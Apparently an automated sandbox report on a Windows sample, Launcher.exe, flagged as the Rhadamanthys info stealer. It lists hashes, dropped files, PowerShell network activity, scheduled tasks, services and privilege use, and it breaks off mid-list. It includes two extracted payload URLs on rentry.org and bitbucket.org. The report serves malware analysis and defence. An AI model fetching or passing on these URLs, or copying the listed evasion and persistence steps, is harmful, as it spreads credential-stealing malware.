Analysis
-
max time kernel
1800s -
max time network
1165s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 18:19
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Launcher.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
eventlog_provider.dll
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
eventlog_provider.dll
Resource
win10v2004-20240611-en
Behavioral task
behavioral5
Sample
libEGL.dll
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
libEGL.dll
Resource
win10v2004-20240611-en
General
-
Target
Launcher.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Extracted
https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2816 created 4888 2816 WerFault.exe timeout.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
a4t42sbh.v231.exesvchost.exedescription pid process target process PID 2116 created 2664 2116 a4t42sbh.v231.exe sihost.exe PID 2324 created 4888 2324 svchost.exe timeout.exe -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exeflow pid process 2 4380 powershell.exe 4 4380 powershell.exe 18 2284 powershell.exe 19 776 powershell.exe 35 880 msiexec.exe 41 3592 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4380 powershell.exe 776 powershell.exe 2284 powershell.exe 3592 powershell.exe 2448 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Launcher.exea4t42sbh.v230.exea4t42sbh.v233.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation a4t42sbh.v230.exe Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation a4t42sbh.v233.exe -
Executes dropped EXE 4 IoCs
Processes:
a4t42sbh.v230.exea4t42sbh.v231.exea4t42sbh.v232.exea4t42sbh.v233.exepid process 4392 a4t42sbh.v230.exe 2116 a4t42sbh.v231.exe 4400 a4t42sbh.v232.exe 2456 a4t42sbh.v233.exe -
Loads dropped DLL 6 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exepid process 4680 MsiExec.exe 4680 MsiExec.exe 4680 MsiExec.exe 4680 MsiExec.exe 2716 MsiExec.exe 4580 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exea4t42sbh.v232.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\MRT.exe a4t42sbh.v232.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\RunNodeScriptAtLogon svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
a4t42sbh.v232.exedescription pid process target process PID 4400 set thread context of 4692 4400 a4t42sbh.v232.exe dialer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-whoami.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\definitions\definition.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-user-validate\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\convert\dmp.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\dump_dependency_json.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-ci-test.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\custom\trap.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\utils\completion.sh msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\disparity-colors\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\index.mjs msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\text.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\create.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\satisfies.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\mjs\signals.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\walk-up-path\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi-cjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\query.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\package-json\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\ignore.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\xml_fix.py msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-profile\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-access.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\has-color.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\parse.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\shebang-command\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\metavuln-calculator\lib\get-dep-spec.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\hosted-git-info\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\mode.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\comment.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\start.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\rebuild.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\case-insensitive-map.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-json-stream\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\process-release.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\preload.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\lib\use-native.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\inc.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\root.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\internal\parse-options.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-ci-test.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\set.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\protobuf-specs\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\API.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-dist-tag.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\mjs\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\gtr.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\shebang-regex\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\bundler\bundle.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-registry-fetch\lib\default-opts.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-publish.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-sized\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-audit-report\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-pick-manifest\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\string-width-cjs\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\protobuf-specs\dist\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\bundle\dsse.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\ansi-regex\index.js msiexec.exe -
Drops file in Windows directory 16 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIE8FC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3902.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6} msiexec.exe File opened for modification C:\Windows\Installer\MSI3BC2.tmp msiexec.exe File opened for modification C:\Windows\Installer\e57d011.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID4C7.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSID468.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE300.tmp msiexec.exe File opened for modification C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon msiexec.exe File created C:\Windows\Installer\e57d015.msi msiexec.exe File created C:\Windows\Installer\e57d011.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID3EA.tmp msiexec.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3784 sc.exe 4012 sc.exe 1040 sc.exe 3584 sc.exe 2516 sc.exe 2656 sc.exe 4028 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4868 schtasks.exe 4292 schtasks.exe -
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4104 2516 timeout.exe 4040 3744 4188 4128 4260 4324 4912 2144 3184 1152 4360 1376 timeout.exe 3716 1576 5084 timeout.exe 1772 timeout.exe 4312 4432 timeout.exe 2624 timeout.exe 4252 4716 4668 1324 1892 timeout.exe 3076 1200 5040 1768 2164 timeout.exe 2944 2268 656 1732 1380 3544 224 4412 1904 1472 3316 timeout.exe 4836 timeout.exe 2356 2400 4916 1576 4404 timeout.exe 3200 2736 4208 4964 timeout.exe 4732 2000 1608 3132 3136 3432 timeout.exe 2372 2164 4940 4932 1340 916 -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 1492 tasklist.exe 3716 tasklist.exe 1408 tasklist.exe 972 tasklist.exe 2816 tasklist.exe 2392 tasklist.exe 412 tasklist.exe 3408 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3228 taskkill.exe 4396 taskkill.exe 1608 taskkill.exe 4572 taskkill.exe 4584 taskkill.exe 3016 taskkill.exe 4432 taskkill.exe 4404 taskkill.exe -
Modifies data under HKEY_USERS 18 IoCs
Processes:
OfficeClickToRun.exesvchost.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718476038" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 34 IoCs
Processes:
msiexec.exeExplorer.EXEsihost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\4E10.tmp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\PackageName = "nodejs-installer.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPath msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4E10.tmp\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\corepack msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\npm msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exea4t42sbh.v231.exedialer.exea4t42sbh.v232.exepowershell.exedialer.exepid process 4380 powershell.exe 4380 powershell.exe 2284 powershell.exe 2284 powershell.exe 776 powershell.exe 776 powershell.exe 2116 a4t42sbh.v231.exe 2116 a4t42sbh.v231.exe 3220 dialer.exe 3220 dialer.exe 3220 dialer.exe 3220 dialer.exe 4400 a4t42sbh.v232.exe 2448 powershell.exe 2448 powershell.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4400 a4t42sbh.v232.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4400 a4t42sbh.v232.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe 4692 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exea4t42sbh.v232.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exemsiexec.exemsiexec.exetasklist.exesvchost.exedescription pid process Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 4400 a4t42sbh.v232.exe Token: SeDebugPrivilege 4692 dialer.exe Token: SeShutdownPrivilege 1588 powercfg.exe Token: SeCreatePagefilePrivilege 1588 powercfg.exe Token: SeShutdownPrivilege 4568 powercfg.exe Token: SeCreatePagefilePrivilege 4568 powercfg.exe Token: SeShutdownPrivilege 3684 powercfg.exe Token: SeCreatePagefilePrivilege 3684 powercfg.exe Token: SeShutdownPrivilege 2992 powercfg.exe Token: SeCreatePagefilePrivilege 2992 powercfg.exe Token: SeAuditPrivilege 2244 svchost.exe Token: SeShutdownPrivilege 316 msiexec.exe Token: SeIncreaseQuotaPrivilege 316 msiexec.exe Token: SeSecurityPrivilege 880 msiexec.exe Token: SeCreateTokenPrivilege 316 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 316 msiexec.exe Token: SeLockMemoryPrivilege 316 msiexec.exe Token: SeIncreaseQuotaPrivilege 316 msiexec.exe Token: SeMachineAccountPrivilege 316 msiexec.exe Token: SeTcbPrivilege 316 msiexec.exe Token: SeSecurityPrivilege 316 msiexec.exe Token: SeTakeOwnershipPrivilege 316 msiexec.exe Token: SeLoadDriverPrivilege 316 msiexec.exe Token: SeSystemProfilePrivilege 316 msiexec.exe Token: SeSystemtimePrivilege 316 msiexec.exe Token: SeProfSingleProcessPrivilege 316 msiexec.exe Token: SeIncBasePriorityPrivilege 316 msiexec.exe Token: SeCreatePagefilePrivilege 316 msiexec.exe Token: SeCreatePermanentPrivilege 316 msiexec.exe Token: SeBackupPrivilege 316 msiexec.exe Token: SeRestorePrivilege 316 msiexec.exe Token: SeShutdownPrivilege 316 msiexec.exe Token: SeDebugPrivilege 316 msiexec.exe Token: SeAuditPrivilege 316 msiexec.exe Token: SeSystemEnvironmentPrivilege 316 msiexec.exe Token: SeChangeNotifyPrivilege 316 msiexec.exe Token: SeRemoteShutdownPrivilege 316 msiexec.exe Token: SeUndockPrivilege 316 msiexec.exe Token: SeSyncAgentPrivilege 316 msiexec.exe Token: SeEnableDelegationPrivilege 316 msiexec.exe Token: SeManageVolumePrivilege 316 msiexec.exe Token: SeImpersonatePrivilege 316 msiexec.exe Token: SeCreateGlobalPrivilege 316 msiexec.exe Token: SeAuditPrivilege 2244 svchost.exe Token: SeRestorePrivilege 880 msiexec.exe Token: 